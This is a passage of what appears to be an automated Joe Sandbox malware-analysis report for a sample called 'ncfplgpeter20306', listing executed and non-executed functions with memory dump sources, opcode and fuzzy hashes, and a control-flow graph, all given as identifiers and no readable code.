                                                  • Instruction Fuzzy Hash: DD51FE74D1520CCFDB14CFA9D484ADCBBB2FB69325F20862AE025AB394D7749886CF10
                                                  Function 001CE2AB Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1336 1ce2ab 1337 1ce36a-1ce37b 1336->1337 1338 1ce37d 1337->1338 1339 1ce382-1ce38b 1337->1339 1338->1339 1341 1ce391-1ce3a4 1339->1341 1342 1ce163-1ce188 1339->1342 1343 1ce3ab-1ce3c6 1341->1343 1344 1ce3a6 1341->1344 1345 1ce18f-1ce1c5 1342->1345 1346 1ce18a 1342->1346 1347 1ce3cd-1ce3e1 1343->1347 1348 1ce3c8 1343->1348 1344->1343 1355 1ce1cc-1ce1fe 1345->1355 1356 1ce1c7 1345->1356 1346->1345 1351 1ce3e8-1ce3fe LdrInitializeThunk 1347->1351 1352 1ce3e3 1347->1352 1348->1347 1354 1ce400-1ce4fc 1351->1354 1352->1351 1359 1ce4fe-1ce503 1354->1359 1360 1ce504-1ce50e 1354->1360 1361 1ce200-1ce225 1355->1361 1362 1ce262-1ce275 1355->1362 1356->1355 1359->1360 1364 1ce22c-1ce25a 1361->1364 1365 1ce227 1361->1365 1366 1ce27c-1ce2a1 1362->1366 1367 1ce277 1362->1367 1364->1362 1365->1364 1370 1ce2b0-1ce2e8 1366->1370 1371 1ce2a3-1ce2a4 1366->1371 1367->1366 1372 1ce2ef-1ce350 1370->1372 1373 1ce2ea 1370->1373 1371->1341 1378 1ce357-1ce369 1372->1378 1379 1ce352 1372->1379 1373->1372 1378->1337 1379->1378
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 001CE3ED
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1bcff6c85ac1b4cf0608e96b257d410c28bebe16e748bf0d6d6fee7512a54005
                                                  • Instruction ID: d2279c959ad0a7f36561cf3c373cafb6ed340cf51f87e15aea9d7067e44ca4af
                                                  • Opcode Fuzzy Hash: 1bcff6c85ac1b4cf0608e96b257d410c28bebe16e748bf0d6d6fee7512a54005
                                                  • Instruction Fuzzy Hash: A2115974E00259DFEB08DBA9C884FADBBF5FBA8305F648529E804E7245D730E9418B20
                                                  Function 00940006 Relevance: .2, Instructions: 188COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f289b786fa1225c407e0ff52b94bf9013a67ef1709397ab5a174ec38c5d9d34
                                                  • Instruction ID: d580ff2cb6297cdc9bb4fb95dadb887f9303232637ac9f7a68c451989667cd38
                                                  • Opcode Fuzzy Hash: 6f289b786fa1225c407e0ff52b94bf9013a67ef1709397ab5a174ec38c5d9d34
                                                  • Instruction Fuzzy Hash: 3691F474E052698FDB65DF65DC51BEDBBB2AF8A300F1480EAD908A7291DB305E81CF40
                                                  Function 008B4330 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28d19f4a6e2780d6a4704aa91f7729428ed770daf48f6647d868b2d1e4cfbbc5
                                                  • Instruction ID: 06cca7313ea6d95c1f0dc30e955c4cc47e145e7d574baf4c843470ce916b77a7
                                                  • Opcode Fuzzy Hash: 28d19f4a6e2780d6a4704aa91f7729428ed770daf48f6647d868b2d1e4cfbbc5
                                                  • Instruction Fuzzy Hash: 9671C074E002188FDB14DFA5D891AEDBBB2FF89300F64852AD405BB359EB35A942CF50
                                                  Function 00709640 Relevance: .2, Instructions: 171COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907030264.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_700000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 020b73f29b7caeb969c01ebe4f3af02f48287a292731a740e32d4e87c41249d9
                                                  • Instruction ID: 7fb3913e1e5a9b7511c22a9b09b220fb63049dd8a9c20aaa87ef66bd359a125a
                                                  • Opcode Fuzzy Hash: 020b73f29b7caeb969c01ebe4f3af02f48287a292731a740e32d4e87c41249d9
                                                  • Instruction Fuzzy Hash: 0B71AE74E00218CFDB14DFA5D990AADBBF2FB89300F248529D415BB399DB35A942CF54
                                                  Function 00941BC0 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d0ebe73438340232efd036e36f4897f428fee166e4e4a6b5e9ffc803d739f451
                                                  • Instruction ID: e30702ba5bc140515c35b096997a6504e33adfa72b90d7d1215b19c09384aa16
                                                  • Opcode Fuzzy Hash: d0ebe73438340232efd036e36f4897f428fee166e4e4a6b5e9ffc803d739f451
                                                  • Instruction Fuzzy Hash: A441AE74D01248CFDB04DFA5D598BEDBBF1BF89301F14812AE805BB2A4DB746946CB54
                                                  Function 00941BD0 Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4947a502046166a0e682ae3d6bf30e6e1265e5b1e187abf86c8d9642a3838d2
                                                  • Instruction ID: 964e5cf0dd0661847ed884be05c9bc51ad296511ca8160a40493d1ca7fcafc86
                                                  • Opcode Fuzzy Hash: e4947a502046166a0e682ae3d6bf30e6e1265e5b1e187abf86c8d9642a3838d2
                                                  • Instruction Fuzzy Hash: 3741AF74D01248CFDB04DFA5D998BDDBBF1BB89301F14802AE805BB2A4DB746946CF54
                                                  Function 008BA5DB Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7427572aa00faf32ede65fd37fe9f68dc788dcc60c097525cfaf8bbd828cc65e
                                                  • Instruction ID: 1971d63189940e08dc2e2e25ae81fc4b0dafabc2a063df5427a5bf6b53a31954
                                                  • Opcode Fuzzy Hash: 7427572aa00faf32ede65fd37fe9f68dc788dcc60c097525cfaf8bbd828cc65e
                                                  • Instruction Fuzzy Hash: CC31CE70E002488FDB18DFAAD8546EEBBB2FF99300F14D12AD418BB254EB349902CF55
                                                  Function 00709634 Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907030264.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_700000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e23ddc30bc63cf6cc3486cae6aaa4cf574da034c6c85fb16e12d9c0fc96b117
                                                  • Instruction ID: e514b6ade295b74e57e3b115c04f45c1c8cddf090561c892b01e0f81eaf4334c
                                                  • Opcode Fuzzy Hash: 3e23ddc30bc63cf6cc3486cae6aaa4cf574da034c6c85fb16e12d9c0fc96b117
                                                  • Instruction Fuzzy Hash: 4D31C374E00248CFDB08DFAAD5446DDBBF2AF9A300F24912AD515BB395DB349942CF54
                                                  Function 008B4325 Relevance: .1, Instructions: 90COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bb66a594984f7271b346c245e2ed06979a1e2753d82ff4c7b7867e85b7f18e2a
                                                  • Instruction ID: fa707906fd012dc6eb897590915a46ec03aa8ccdc945fc23f8a813e8573dfbed
                                                  • Opcode Fuzzy Hash: bb66a594984f7271b346c245e2ed06979a1e2753d82ff4c7b7867e85b7f18e2a
                                                  • Instruction Fuzzy Hash: DF31CE70E012088FDB18DFAAD555AEEBBF2BF99300F24902AD419BB354DB3499428F54
                                                  Function 0013D044 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906877743.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_13d000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 136178be3fa9f0ae19ecfc52494e3d2e52e7836a1a6235c1ddf5561a89317aee
                                                  • Instruction ID: e2709e7e2d07ca890e18c5080c4fb27e297f07e5bd0c594bd1c02316f82322e0
                                                  • Opcode Fuzzy Hash: 136178be3fa9f0ae19ecfc52494e3d2e52e7836a1a6235c1ddf5561a89317aee
                                                  • Instruction Fuzzy Hash: FF21D475604344EFDB18CF24F9C4B26BB65EB84714F34C5A9E8494B242C73AD84ACB62
                                                  Function 0013D03F Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906877743.000000000013D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0013D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_13d000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c543587dbf798b3276e1c85d396dfc0aaa0424a501100da92bacfcb08f3f4f26
                                                  • Instruction ID: 67e0dd9c230a449e5313470d644e9bb1e432f7c3d5c5984f4d19dca7da3751fc
                                                  • Opcode Fuzzy Hash: c543587dbf798b3276e1c85d396dfc0aaa0424a501100da92bacfcb08f3f4f26
                                                  • Instruction Fuzzy Hash: 20119D75504284DFDB15CF20E9C4B15FFA1FB84714F24C6A9E8494B656C33AD84ACFA2

                                                  Non-executed Functions

                                                  Function 007180A0 Relevance: .3, Instructions: 300COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 09566b193ea0df42b42fdfc8217370b42b5820fd7fc5ca7b7201c624530fd95f
                                                  • Instruction ID: 53058e6e9b461d24bff3e9d4ab8e09b06595e4c8a156b1c304d34bad0b0b7d3a
                                                  • Opcode Fuzzy Hash: 09566b193ea0df42b42fdfc8217370b42b5820fd7fc5ca7b7201c624530fd95f
                                                  • Instruction Fuzzy Hash: 61E1BD74E00218CFDB64DFA9C954B9DBBB2BF89300F2481AAD408BB395DB355A85CF51
                                                  Function 008DDE88 Relevance: .3, Instructions: 296COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907163132.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8d0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: fff432e7614ec091ff66d002133dc10cf7b76b83ae4b4af7f30aaa5957f97cfc
                                                  • Instruction ID: 51d7c664a0d7602e9c5666aa3b4bf244de10c514c9935855a9685f0ece4388c1
                                                  • Opcode Fuzzy Hash: fff432e7614ec091ff66d002133dc10cf7b76b83ae4b4af7f30aaa5957f97cfc
                                                  • Instruction Fuzzy Hash: DFE1DF74E01218CFEB24DFA5C854B9DBBB2FF89304F2081AAD408AB395DB755A85CF51
                                                  Function 008B2680 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc3bb4a1b17cff6fd1e834a532d2a41bfc9821e0ca1c699d65c00f7f9b36deb6
                                                  • Instruction ID: e0b5f96e95167f013bbab20789af45d48e680f8bfe5f67b17f35214f40c5faad
                                                  • Opcode Fuzzy Hash: bc3bb4a1b17cff6fd1e834a532d2a41bfc9821e0ca1c699d65c00f7f9b36deb6
                                                  • Instruction Fuzzy Hash: A4D1AF74E002288FDB14DFA5C994B9DBBB2FF89300F6081AAD409AB354DB359E81CF51
                                                  Function 008B0E98 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0185bd037d4a07cfbff3cba8d916fcfff5d44b2f21ba3d24283c93183c299b7f
                                                  • Instruction ID: 58272b1fb85c30a64664b9d0858dd3fb12582ada87a578f90bd9ca60a019d22c
                                                  • Opcode Fuzzy Hash: 0185bd037d4a07cfbff3cba8d916fcfff5d44b2f21ba3d24283c93183c299b7f
                                                  • Instruction Fuzzy Hash: F7D19F74E002188FDB54DFA5D994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 008B21B8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: aa8025eb0c4fbbe03f88bf60afa5d2c30921be30adc861296bc1b63112b45d90
                                                  • Instruction ID: 5718e8bd5c947881a491b4d0cc10d42c4b472357c844894a470b4bc489db1998
                                                  • Opcode Fuzzy Hash: aa8025eb0c4fbbe03f88bf60afa5d2c30921be30adc861296bc1b63112b45d90
                                                  • Instruction Fuzzy Hash: 81D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 008B34D8 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 57f9e6e746683adb71426f2ddfe219c470078683d00cdab6e3eae3812e402bfb
                                                  • Instruction ID: 70d58ace37420a86dd5693a5abcec8828bc6d5db10e6077cbb34f8cb26795df2
                                                  • Opcode Fuzzy Hash: 57f9e6e746683adb71426f2ddfe219c470078683d00cdab6e3eae3812e402bfb
                                                  • Instruction Fuzzy Hash: 93D18E74E002188FDB54DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 008B09D0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f52bf2ed55358e4855f57a66ca30a27c9825c0a6e7e014f71971548170a08e0c
                                                  • Instruction ID: 8cc3019d0dbbe695dbfc89bed2a79f75a434cd9bad94680f26dcbe582b980db6
                                                  • Opcode Fuzzy Hash: f52bf2ed55358e4855f57a66ca30a27c9825c0a6e7e014f71971548170a08e0c
                                                  • Instruction Fuzzy Hash: F0D19E74E002188FDB54DFA5C994B9DBBB2FF89300F6085AAD409AB394DB359E81CF51
                                                  Function 008B1CF0 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9c5b617d0226382f008cc28b6b2ade955134d9a786f60721c23921e76635133
                                                  • Instruction ID: c52378c0b3396a5815163af104249b938eb7851e6acef32831621af743f736a8
                                                  • Opcode Fuzzy Hash: f9c5b617d0226382f008cc28b6b2ade955134d9a786f60721c23921e76635133
                                                  • Instruction Fuzzy Hash: 53D1AF74E002188FDB14DFA5C994B9DBBB2FF89300F6481AAD409AB354DB35AE81CF51
                                                  Function 008B0508 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ad121d29121580bbc8b886de9588be5d23fa5169c35068c6c40e5e5655511e4a
                                                  • Instruction ID: fdf416fbabf23780d1d6ace60587ab35486953afc9e7f85c1f93895ceae903e9
                                                  • Opcode Fuzzy Hash: ad121d29121580bbc8b886de9588be5d23fa5169c35068c6c40e5e5655511e4a
                                                  • Instruction Fuzzy Hash: 08D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 008B3010 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 19e989bdb4480ee8975f1e9857b079635ba7bc6d25fea8d3c0d8ef0aaaddc8a4
                                                  • Instruction ID: b9400426e28a62db72bad8f28b2ad8382af6e16bf03a66b06fc8fe0ca04f7dab
                                                  • Opcode Fuzzy Hash: 19e989bdb4480ee8975f1e9857b079635ba7bc6d25fea8d3c0d8ef0aaaddc8a4
                                                  • Instruction Fuzzy Hash: 88D19F74E002188FDB14DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 008B1828 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ab9a903abc74f79560eddf6cba8ca9d2b1e6c5b63105bebb5a38c5f9e92f07a5
                                                  • Instruction ID: f92521d2b4fb6902271c2a79ecbd702fc082c5376751c3d565afd3bd389f57dd
                                                  • Opcode Fuzzy Hash: ab9a903abc74f79560eddf6cba8ca9d2b1e6c5b63105bebb5a38c5f9e92f07a5
                                                  • Instruction Fuzzy Hash: E3D19F74E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 008B2B48 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c195aa3869c32137488be48155a77038f463b077d55a4315de2e8bdde413f725
                                                  • Instruction ID: eec1ab0eec7fcd5cbacabc597043ef65343c1c263ded3ca7dff88fef5c1d94ea
                                                  • Opcode Fuzzy Hash: c195aa3869c32137488be48155a77038f463b077d55a4315de2e8bdde413f725
                                                  • Instruction Fuzzy Hash: 06D1A074E002188FDB54DFA5C894BADBBB2FF89300F6081AAD409AB354DB359E81CF51
                                                  Function 008B0040 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4b3172ff0fee4caed6568d40409e95d3a239b2fc86046dedbdbd5652d8eb0501
                                                  • Instruction ID: 626b763c8bff0baa6335f143dbbc1174eaf18dfd93735732c881a1faf6e9eced
                                                  • Opcode Fuzzy Hash: 4b3172ff0fee4caed6568d40409e95d3a239b2fc86046dedbdbd5652d8eb0501
                                                  • Instruction Fuzzy Hash: 5AD19E74E002188FDB54DFA5D994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 008B3E68 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e76ea741b0a3750afaa7b3e619ff32a0ce61deb10b95400da8906b1f48ebeaf
                                                  • Instruction ID: 75576ac631f4526d4d571f1d40b4f6b21d0d2d1751e1f0ac532b6794df5fffa8
                                                  • Opcode Fuzzy Hash: 1e76ea741b0a3750afaa7b3e619ff32a0ce61deb10b95400da8906b1f48ebeaf
                                                  • Instruction Fuzzy Hash: 84D1AF74E002188FDB54DFA5C895B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 008B1360 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907149405.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_8b0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b350c38797bebed661486d3fbf0bf9837b9f8e80d606b87554f85aacd2eb79a
                                                  • Instruction ID: cf4c5d499594969f0171b05dc1c32a99aa5068c31d82ef6e5f796f1fd97169d4
                                                  • Opcode Fuzzy Hash: 6b350c38797bebed661486d3fbf0bf9837b9f8e80d606b87554f85aacd2eb79a
                                                  • Instruction Fuzzy Hash: 3AD19F74E002188FDB14DFA5C994B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 0071C570 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 299213eac12d64ec8263c6352c13a844df3f2519377a4c6c6bdb82747eea48fb
                                                  • Instruction ID: 813e544407ad3445462833685a8ac0d420ebd7d0dd12e5fbcadd418cb5577a7e
                                                  • Opcode Fuzzy Hash: 299213eac12d64ec8263c6352c13a844df3f2519377a4c6c6bdb82747eea48fb
                                                  • Instruction Fuzzy Hash: D1D19074E002188FDB54DFA5C994B9DBBB2FF89300F6081AAD409AB394DB359E81CF51
                                                  Function 0071F078 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e502d4517c99b96a01100232456ddb66ceb62e5fc0f09d9c88b851a5989f0f9d
                                                  • Instruction ID: fe7fe9e474ecc51299116e39640f504b73d484fe4313b96e2e22666ad3ca2f92
                                                  • Opcode Fuzzy Hash: e502d4517c99b96a01100232456ddb66ceb62e5fc0f09d9c88b851a5989f0f9d
                                                  • Instruction Fuzzy Hash: FDD1A074E002188FDB14DFA5C894B9DBBB2FF89300F6081AAD409AB395DB359E81CF51
                                                  Function 00719A68 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12cd8e4e3c590877ca420a0928626033b91125361bd64578a11a1d2e412783c2
                                                  • Instruction ID: 995d11b07f2f9d2dd6a8523ea47281c4f0d77458bb5d53a11ba579fa09411cd6
                                                  • Opcode Fuzzy Hash: 12cd8e4e3c590877ca420a0928626033b91125361bd64578a11a1d2e412783c2
                                                  • Instruction Fuzzy Hash: 65D1AF74E002188FDB54DFA5D894B9DBBB2FF89300F6481AAD409AB394DB359E81CF51
                                                  Function 0071B250 Relevance: .3, Instructions: 292COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907037881.0000000000710000.00000040.00000800.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_710000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a205143b443c6b1299a1ca223fe0a5e582de627820a034c2a3740f9bc2b1b2e8
                                                  • Instruction ID: 7fce30739f170a355b98a49036897ce84bd13d298c20881c9be21226e9650cfc
                                                  • Opcode Fuzzy Hash: a205143b443c6b1299a1ca223fe0a5e582de627820a034c2a3740f9bc2b1b2e8
